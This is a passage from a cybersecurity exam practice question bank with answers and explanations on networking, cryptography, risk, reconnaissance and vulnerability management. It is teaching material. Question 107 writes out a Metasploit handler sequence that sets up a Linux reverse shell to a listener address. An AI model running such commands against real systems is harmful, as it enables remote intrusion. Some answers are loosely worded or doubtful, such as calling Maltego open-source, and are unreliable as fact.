management capabilities, providing a comprehensive and integrated view of an organization's
information security.

Question 80

>Question : In which OSI layer do protocols like XML and JSON operate?

>Options :

1. Media signal and transmission

2. Interhost communication

3. Data representation and encryption

4. Path determination and logical addressing

>Answer : Data representation and encryption.

>Explanation : XML and JSON operate in the Presentation layer of the OSI model, which is responsible
for data representation and encryption. This layer translates data between the application layer and the
network format.

Question 81

>Question : A cybersecurity engineer comes across a risk of threat and needs to analyze if the risk is
quantitative or qualitative. How does he differentiate between the type of risk?

>Options :

1. Quantitative risk analysis makes use of real numbers; qualitative risk analysis is a subjective
assessment of risk occurrence

2. Quantitative risk analysis results in subjective high, medium, or low results; qualitative risk analysis
uses Monte-Carlo Simulation
 3. Quantitative risk analysis does not use the hard cost of losses; a qualitative risk analysis does

4. Quantitative risk analysis cannot be automated whereas qualitative risk analysis is automated

>Answer : Quantitative risk analysis makes use of real numbers; qualitative risk analysis is a subjective
assessment of risk occurrence.

>Explanation : Quantitative risk analysis involves using numerical values and metrics to assess risk,
whereas qualitative risk analysis is based on subjective judgment and estimation to evaluate the
likelihood and impact of risks.

Question 82

>Question : How to prevent ClickJacking?

>Options :

1. Enable X-Frame Option

2. Use only Firefox web browser

3. Disable pop-up settings in web browser

4. Use authenticated logins

>Answer : Enable X-Frame Option.

>Explanation : To prevent ClickJacking attacks, enabling the X-Frame Option in web browsers is effective.
This header tells the browser whether the site’s content can be displayed within frames, which are often
used in ClickJacking attacks.

Question 83

>Question : A target's security data is covered by parties on all fronts including red teams and blue
teams. Which attack strategy indicates 'Social Engineering'?

>Options :

1. Using authoritative DNS servers as the source of information to include every single surface point
exposed to the Internet

2. Using web crawlers to fetch information about anything, and this includes companies, persons,
services, and even real hacks

3. Using Facebook, Twitter, LinkedIn and other social networks sources of information to build a profile,
especially when targeting individuals

4. Planning in-person chat, phone conversations, and email spoofing attacks banking on the psychology
of human weakness, needed to get maximum data about the target
>Answer : Planning in-person chat, phone conversations, and email spoofing attacks banking on the
psychology of human weakness, needed to get maximum data about the target.

>Explanation : Social engineering attacks involve manipulating individuals into divulging confidential
information and are often carried out through direct communication like chats, phone calls, and email
spoofing.

Question 84

>Question : Which one of these organizations is a non-regulatory agency responsible for creating
cybersecurity frameworks?

>Options :

1. NIST

2. FBI

3. CIA

4. ANSI

>Answer : N

IST.

>Explanation : The National Institute of Standards and Technology (NIST) is a non-regulatory agency
known for creating and publishing standards, guidelines, and cybersecurity frameworks.

Question 85

>Question : Security experts use an open-source tool that permits mining and gathering information to
present findings. The tool looks up domain names, the network block addresses, and MX records. This
tool also identifies key relationships between the objects. Which OSINT and graphical link analysis tool
should be used for data-mining?

>Options :

1. Reindeer

2. Ping

3. Lumber

4. Maltego

>Answer : Maltego.
>Explanation : Maltego is a powerful open-source tool used for open-source intelligence and graphical
link analysis. It is capable of mining and gathering information to present detailed relationships between
pieces of information from various sources.

Question 86

>Question : What is footprinting?

>Options :

1. To obtain precise information about the target

2. The process of gathering information about a target and its environment

3. Gathering information about a target without disclosing your intentions

4. Gathering as much data as possible about a certain target application

>Answer : The process of gathering information about a target and its environment.

>Explanation : Footprinting is the first step in ethical hacking or penetration testing, which involves
collecting as much information as possible about a target system, its network, and its environment.

Question 87

>Question : Interconnectivity and globalization of cybercrime are driving at greater frequency and
severity of cyber incidents. Why is it important for different stakeholders of a business to share risk
information?

>Options :

1. To implement a crisis or breach response plan

2. To test the trust between the business management and the stakeholders

3. To calculate the cost-benefit ratio

4. For pre-audit documentation

>Answer : To implement a crisis or breach response plan.

>Explanation : Sharing risk information among stakeholders is crucial for implementing effective crisis or
breach response plans, allowing for a coordinated and informed approach to managing cyber incidents.

Question 88

>Question : Based on security requirements, the SOC team has been identified to detect and manage
cybersecurity incidents. Which of these services would the MSSP provide?
>Options :

1. Concentrate on the assets closest to the CTO

2. Company's inter-process communication

3. Ensure higher levels of data accuracy

4. Monitor events from logs, identify and respond to incidents

>Answer : Monitor events from logs, identify and respond to incidents.

>Explanation : A Managed Security Service Provider (MSSP) typically provides services such as
monitoring events from logs and identifying and responding to cybersecurity incidents, as part of its
offerings to manage and mitigate security threats.
Question 89

>Question : Take a look at this RSA algorithm. What is the Private key?

>Options :

1. ed-1 = 3.7 - 1

2. (n, e) = (33, 3)

3. pq = 3-R

4. (n, d) = (33, 7)

>Answer : (n, d) = (33, 7).

>Explanation : In the RSA algorithm, the private key is represented as (n, d), where 'n' is the product of
the two primes and 'd' is the multiplicative inverse of 'e' modulo phi. In this case, (n, d) = (33, 7)
represents the private key.

Question 90

>Question : A user's passwords and computer accounts are stored and that information is shared with
other entities on the network by the LDAP platform. What port does LDAP use?

>Options :

1. 143

2. 389

3. 3306

4. 3389

>Answer : 389.

>Explanation : LDAP (Lightweight Directory Access Protocol) typically uses port 389 for its unsecured
connections, allowing communication and data exchange over the network.

Question 91

>Question : This is a backdoor script that runs on a web server. Hackers control the web servers using
these scripts.

>Options :

1. Malware

2. Container Trojan
 3. Web Shell

4. Virus

>Answer : Web Shell.

>Explanation : A Web Shell is a backdoor script that runs on a web server, providing an interface for
remote control and command execution by hackers.

Question 92

>Question : As a Cybersecurity Engineer in a resort, your task is to secure data of customers logging into
the resort's mobile application to confirm bookings. What would you do to build security into the
resort's mobile application?

>Options :

1. Prepare security policies

2. Issue notification alerts

3. Provide Admin access control

4. Sign up for Code of Ethics training

>Answer : Prepare security policies.

>Explanation : Preparing comprehensive security policies is crucial for building security into a mobile
application. This includes defining guidelines for data handling, access controls, and other security
measures to protect customer data.

Question 93

>Question : How would you conduct threat intelligence research using the Dark Web?

>Options :

1. Use Google Incognito mode

2. Use Tor browser

3. Use Firefox private mode

4. Use Brave browser

>Answer : Use Tor browser.

>Explanation : The Tor browser is specifically designed to access the dark web while maintaining
anonymity and privacy, making it a suitable tool for conducting threat intelligence research in these
areas.
Question 94

>Question : PCI DSS Requirement 11.2 entails organizations that store, process, and/or transmit
cardholder data electronically to run internal and external vulnerability scans. How often should internal
and external vulnerability scans be conducted or if there is any significant change in the network that
includes new system component installations and product upgrades?

>Options :

1. Every 6 months

2. Every 3 months

3. Daily

4. Yearly

5. Every 9 months

>Answer : Every 3 months.

>Explanation : PCI DSS Requirement 11.2 stipulates that internal and external vulnerability scans should
be conducted quarterly, which equates to every 3 months. This frequency ensures ongoing vigilance and
the detection of new vulnerabilities that may arise due to system changes or emerging threats.

Question 95

>Question : Which website allows you to access backdated webpages, books, audio, video, and images?

>Options :

1. www.internet.org

2. www.archive.org

3. www.dmarc.net

4. www.historyweb.com

>Answer : www.archive.org.

>Explanation : The website www.archive.org, also known as the Internet Archive, allows users to access
backdated webpages, books, audio, video, and images. It serves as a digital library, offering free access to
a wide range of historical and cultural content.
Question 96

Microsoft codes reported zero-day exploits.

-CVE-2021-33742. a remote code execution bug in a Windows HTML component

-CVE-2021-31955. an information disclosure bug in the Windows Kernel

-CVE-2021-31956. an elevation of privilege flaw in Windows NTFS

-CVE-2021-33 739, an elevation of privilege flaw in the Microsoft Desktop Window Manager

Which one of these steps did Microsoft implement to plug hackers from exploiting the vulnerabilities?

1. Discover open ports and access points

2. Release new security updates

3. Gather initial information

4. Identify active machines

>Answer : Release new security updates

>Explanation :

To address the zero-day exploits reported in the CVE (Common Vulnerabilities and Exposures) listings
you've mentioned, the most appropriate step that Microsoft would implement is to release new security
updates. Here's an explanation for each step and why releasing security updates is the most suitable
response:

Discover open ports and access points: This is generally a step taken in the initial stages of a security
assessment, where a cybersecurity team would identify potential entry points for attackers. However,
this step is more about identifying vulnerabilities rather than fixing them.

Release new security updates: This is the most direct and effective approach for mitigating known
vulnerabilities like the ones listed in CVE-2021-33742, CVE-2021-31955, CVE-2021-31956, and CVE-2021-
33739. Security updates would include patches specifically designed to address these vulnerabilities,
preventing hackers from exploiting them. Each of these vulnerabilities (remote code execution,
information disclosure, and elevation of privilege flaws) would be addressed by patching the specific
components of the software where the vulnerabilities exist.

Gather initial information: This step is more about the initial phase of threat detection and response,
where information about potential threats is collected. While it's crucial for overall cybersecurity, it's not
directly related to addressing already identified vulnerabilities.
Identify active machines: This would involve identifying which systems are currently running and
potentially vulnerable. While this is important for ensuring that all affected systems receive the
necessary updates, it's a part of a broader security management process rather than a direct response to
the vulnerabilities.

Therefore, the most appropriate and effective step for Microsoft in response to these CVE reports would
be to release new security updates that specifically address each of the listed vulnerabilities. This would
directly protect users from the potential exploitation of these security flaws.

Question 97

Let’s Encrypt is a certificate authority that provides X. 509 certificates at no charge for which encryption?

A) 3DES
B) Advanced Encryption Standard
C) Transport Layer Security encryption
D) RSA

Answer: Transport Layer Security encryption.

Explanation

Let's Encrypt is a certificate authority that provides X. 509 certificates to enable HTTPS (SSL/TLS) on web
servers, thereby facilitating secure communications over a computer network. These certificates are
used with Transport Layer Security (TLS) protocol to encrypt traffic between clients and servers. Let’s
Encrypt does not provide certificates specifically for 3DES, Advanced Encryption Standard (AES), or RSA
encryption, although RSA can be used as part of the key exchange process in TLS.
Question 98

An attacker first gathers information like IP address, domain name, operating system, IP range, control
panel, services, vulnerable services, etc., and later utilize it based on their motive. What perspective
must pen testers investigate?

A) Company's perspective
B) Insurance perspective
C) Attacker's perspective
D) Investigator's perspective

Answer: Attacker's perspective.

Explanation

Penetration testers, also known as ethical hackers, must adopt the attacker's perspective to effectively
identify and evaluate the security of the system they are testing. By thinking like an attacker, pen testers
can better understand potential vulnerabilities, how they can be exploited, and the possible extent of
the damage. This is essential for identifying the most pressing security risks and implementing the
appropriate defenses. The process described in the question, where information is gathered before
exploitation, is typically known as reconnaissance or information gathering and is the first phase of a
penetration test.
Question 99

What is the target of Layer 7 Application attacks?

A) To impersonate a computer system

B) Cracking weak authentication to gain remote access
C) Where web pages are generated on the server and delivered in response to HTTP requests
D) None of the above

Answer: Where web pages are generated on the server and delivered in response to HTTP requests.

Explanation:

Layer 7 of the OSI model is the application layer, which facilitates the interaction between users and
applications. This layer is responsible for things like web traffic, email, and file transfers. Attacks on this
layer, Layer 7 Application attacks, are often targeted at the web applications themselves, such as
websites and services that generate web pages and respond to user inputs via HTTP requests. Common
examples of such attacks include SQL injection, Cross-Site Scripting (XSS), and Cross-Site Request Forgery
(CSRF). These attacks target the ability of a server to deliver dynamic content and user-specific web
pages correctly and securely.
Question 100
Which one of the following guidelines is NOT included in the NIST 800 Series of documents of the U.S
federal government?

A) Managing insiders or disgruntled employees

B) Applying risk management framework
C) Choosing IT products
D) Developing security plans for federal information systems

Answer: Choosing IT products.

Explanation:

The NIST (National Institute of Standards and Technology) 800 Series is a set of documents that provide
computer security guidelines, recommendations, and reference materials for federal information
systems, excluding national security systems. While the NIST 800 Series covers a wide range of topics,
including managing insiders or disgruntled employees, applying a risk management framework, and
developing security plans for federal information systems, it does not specifically provide guidelines on
choosing IT products. Instead, the selection of IT products is generally conducted through processes like
Requests for Proposals (RFPs) or other procurement processes that evaluate products against specified
requirements, which might reference NIST standards but are not themselves a guideline within the NIST
800 Series.
Question 101

The FIDO Alliance and W3C have launched a standard that makes it easier to offer truly unique
encryption credentials for each site. What is this standard called?

A) 2-Factor Authentication
B) Biometrics Authentication
C) Web Authentication Standard
D) Fingerprint Authentication

Answer: Web Authentication Standard.

Explanation:

The standard referred to in the question is WebAuthn, which stands for Web Authentication. It is a web
standard published by the World Wide Web Consortium (W3C) in association with the FIDO Alliance.
WebAuthn allows users to log into their internet accounts using their preferred device. WebAuthn is a
core component of the FIDO2 Project, which is a set of technology-agnostic security specifications for
strong authentication. It does not refer to 2-Factor Authentication, Biometrics Authentication, or
Fingerprint Authentication specifically, though these may be components of the overall Web
Authentication process.
Question 102

Take a look at this RSA algorithm:

Select two prime numbers p=11, q=3.

n = pq = 11.3 = 33

phi = (p-1)(q-1) = 10.2 = 20

Choose e=3

Check gcd(e, p-1) = gcd(3, 10) = 1 (i.e. 3 and 10 have no common factors except 1),

and check gcd(e, q-1) = gcd(3, 2) = 1

therefore gcd(e, phi) = gcd(e, (p-1)(q-1)) = gcd(3, 20) = 1

Compute d such that ed = 1 (mod phi)

i.e. compute d = (1/e) mod phi = (1/3) mod 20

i.e. find a value for d such that phi divides (ed-1)

i.e. find d such that 20 divides 3d-1.

Simple testing (d = 1, 2, ...) gives d = 7

Check: ed-1 = 3.7 - 1 = 20, which is divisible by phi.

What is the Private key?

A) (a, e) = (33, 3)
B) ed-1 = 3.7 – 1
C) (n, d) = (33, 7)
D) pq/3-R

Answer: (n, d) = (33, 7).

Explanation:
In RSA, the public key consists of n (the product of two prime numbers) and e (the encryption exponent).
The private key is composed of n (the same as in the public key) and d (the decryption exponent). The
value of d is computed such that \( ed \equiv 1 \mod \phi \), where \( \phi \) (phi) is the totient of n
(specifically, \( \phi(n) = (p-1)(q-1) \) for primes p and q). The calculation provided shows that when e=3,
the correct value for d that satisfies this equation is 7, because \( 3 \times 7 - 1 = 20 \), and 20 is divisible
by \( \phi \) which is also 20. Therefore, the private key in this RSA setup is the pair (n, d), which is (33,
7).

Question 103

Which is the correct Wireshark filter to display TCP RESET flag:

A) display reset flag

B) tcp.flags.reset==1
C) show flag reset
D) flags reset equals 0

Answer: tcp.flags.reset==1.

Explanation:

This is the correct syntax for a Wireshark display filter that will show only the packets where the TCP
RESET flag is set. In Wireshark, display filters are used to specify exactly what traffic should be visible in
the packet list pane. The syntax `tcp.flags.reset==1` is used to check for TCP packets where the RESET flag
is set to 1, indicating that the flag is present.
Question 104

A unique technique is used to send packets with the SYN flag sets and requests SYN-ACK from the targets
without establishing a connection, that scans several ports quickly. Which one of the following scans is
before a Denial-of-Service attack?

A) TCP half open

B) TCP connect
C) Ping scan
D) FIN scan

Answer: TCP half open.

Explanation:

This technique is also known as SYN scanning or half-open scanning. It's used to determine which ports
are open without establishing a full TCP connection. The scanner sends a SYN packet, as if it is going to
open a connection and then waits for a response. An open port will respond with a SYN-ACK packet, a
closed port will respond with an RST packet. After receiving the SYN-ACK, the scanner will not complete
the handshake to open the connection; instead, it sends an RST packet to close the session. This type of
scanning is less likely to be logged by the target system's firewall than a full connect scan, which
completes the TCP handshake. This technique can be a precursor to more serious attacks, including
Denial-of-Service (DoS) attacks, because it can be used to map out the network to find targets that may
be vulnerable to such attacks.
Question 105:

Interconnectivity and globalization of cybercrime is driving at greater frequency and severity of cyber
incidents are on the rise. Why is it important for different stakeholders of a business to share risk
information?

A) To implement a crisis or breach response plan

B) For pre-audit documentation
C) To calculate the cost/benefit ratio
D) To test the trust between the business management and the stakeholders

Answer: To implement a crisis or breach response plan.

Explanation

The sharing of risk information among different stakeholders of a business is crucial for developing
effective crisis or breach response plans. By understanding the various risks from multiple perspectives, a
company can create a comprehensive plan that considers all aspects of the business and is informed by
the insights of different departments and stakeholders. This collaboration can lead to more robust
security practices and a unified response in the event of a cyber incident, minimizing damage and
ensuring a coordinated effort in crisis management and resolution. It's not primarily about pre-audit
documentation, calculating cost/benefit ratio, or testing trust, although these can be secondary benefits
of sharing risk information.
Question 106

What does this command do?

openssl rsa -pubout -in rsa_1024_priv.pem -out rsa_1024_pub.pem

A) Generate a Public Key

B) Generate a Paired Key
C) Generate a Session Key
D) Generate a Private Key

Answer: Generate a Public Key.

Explanation:

The command `openssl rsa -pubout -in rsa_1024_priv.pem -out rsa_1024_pub.pem` is used to extract
the public key from an RSA private key file. The `-pubout` flag specifies that the output should be a public
key, the `-in` flag specifies the input file which in this case is the private key `rsa_1024_priv.pem`, and the
`-out` flag specifies the output file name for the public key, which in this case will be
`rsa_1024_pub.pem`. This command does not generate a paired key, session key, or a private key; it
extracts the public key from an existing private key.
Question 107

What does this metasploit command do?

use exploit/multi/handler

set PAYLOAD linux/x86/shell/reverse_tcp

set LHOST 192.168.1.63

set LPORT 4444

exploit

A) The multi keyword means universal access

B) Exploits Linux vulnerabilities
C) It creates Windows payloads
D) Establishes Linux reverse shell

Answer: Establishes Linux reverse shell.

Explanation:

The Metasploit command sequence provided is setting up a reverse TCP handler to establish a reverse
shell. It sets the payload to `linux/x86/shell/reverse_tcp`, which means it's preparing to create a reverse
shell on a Linux target. The LHOST and LPORT settings specify the attacker's listening host and port,
which the target system will connect back to once the exploit is triggered. When the `exploit` command
is run, Metasploit will wait for a connection from the target system to the specified LHOST and LPORT,
providing the attacker with a shell if the payload is executed on the target system. This is a common
technique used to establish a command and control channel after exploiting a vulnerability on the target
system.
Question 108

Huge losses incurred due to disruption of services, therefore organization find it difficult to fix a
vulnerability within the standard delivery time. However, vulnerabilities should be fixed quickly. What
should be the best practice based on Gartner’s recommendations?

A) Nessus is a safe open-source vulnerability scanner

B) Use Pineapple WiFi pentest tool
C) Patching a system should be given the most importance
D) Prioritize vulnerability based on risk"

Answer: Prioritize vulnerability based on risk.

Explanation

According to best practices recommended by Gartner and other cybersecurity experts, while patching
systems is critical, it is equally important to prioritize vulnerabilities based on the level of risk they pose
to the organization. This means evaluating the potential impact of the vulnerability and the likelihood of
its exploitation. By doing so, organizations can ensure that the most dangerous vulnerabilities are
remediated first, which can help manage limited resources effectively and reduce the risk of significant
damage or service disruption. Nessus being a vulnerability scanner and the use of a WiFi pentest tool like
Pineapple are tools that can help in the process, but the prioritization based on risk is the strategic
approach recommended for managing vulnerabilities.
Question 109

Static application security testing (SAST) relates to what kind of testing?

A) Intrusion testing
B) White box testing
C) Patch testing
D) Denial of service testing

Answer: White box testing.

Explanation:

Static Application Security Testing (SAST) is a method of testing that examines the source code, bytecode,
or binary code of an application for security vulnerabilities. It is often conducted in a non-runtime
environment and is hence referred to as "white box" testing because it is done with an internal
perspective of the system, much like a developer who has full visibility into the software's architecture
and implementation. SAST tools scan the application's code to detect and report on patterns that may
indicate security vulnerabilities. This type of testing does not include intrusion, patch, or denial of service
testing, which are dynamic testing methods performed from an external perspective or involve the
operational aspects of the application.

110 How does a network vulnerability scanner work?

A) Requires Wireshark and PCAP to capture files.

B) It is based on MD5 and SHA-2 checksum file signatures.

C) Operating System file signatures are required to conduct vulnerability scans.

D) Vulnerability scanners rely on a database of vulnerabilities and automated tests for them.

Answer : Vulnerability scanners rely on a database of vulnerabilities and automated tests for them.

Explanation:

Network Vulnerability Scanners are tools designed to identify vulnerabilities within a network's devices,
systems, and applications. These scanners work by performing the following tasks:

Database of Vulnerabilities: The scanner uses a database of known vulnerabilities, which is regularly
updated to include new threats. This database contains information on various security flaws, including
those related to software, operating systems, and network devices.
Automated Tests: The scanner runs automated tests against the network's systems, comparing them
against the known vulnerabilities in its database. It checks for misconfigurations, missing patches,
outdated software, and other common security issues.

Detection and Reporting: Once the scanner detects vulnerabilities, it reports them to the network
administrator, often with severity ratings and recommendations for remediation.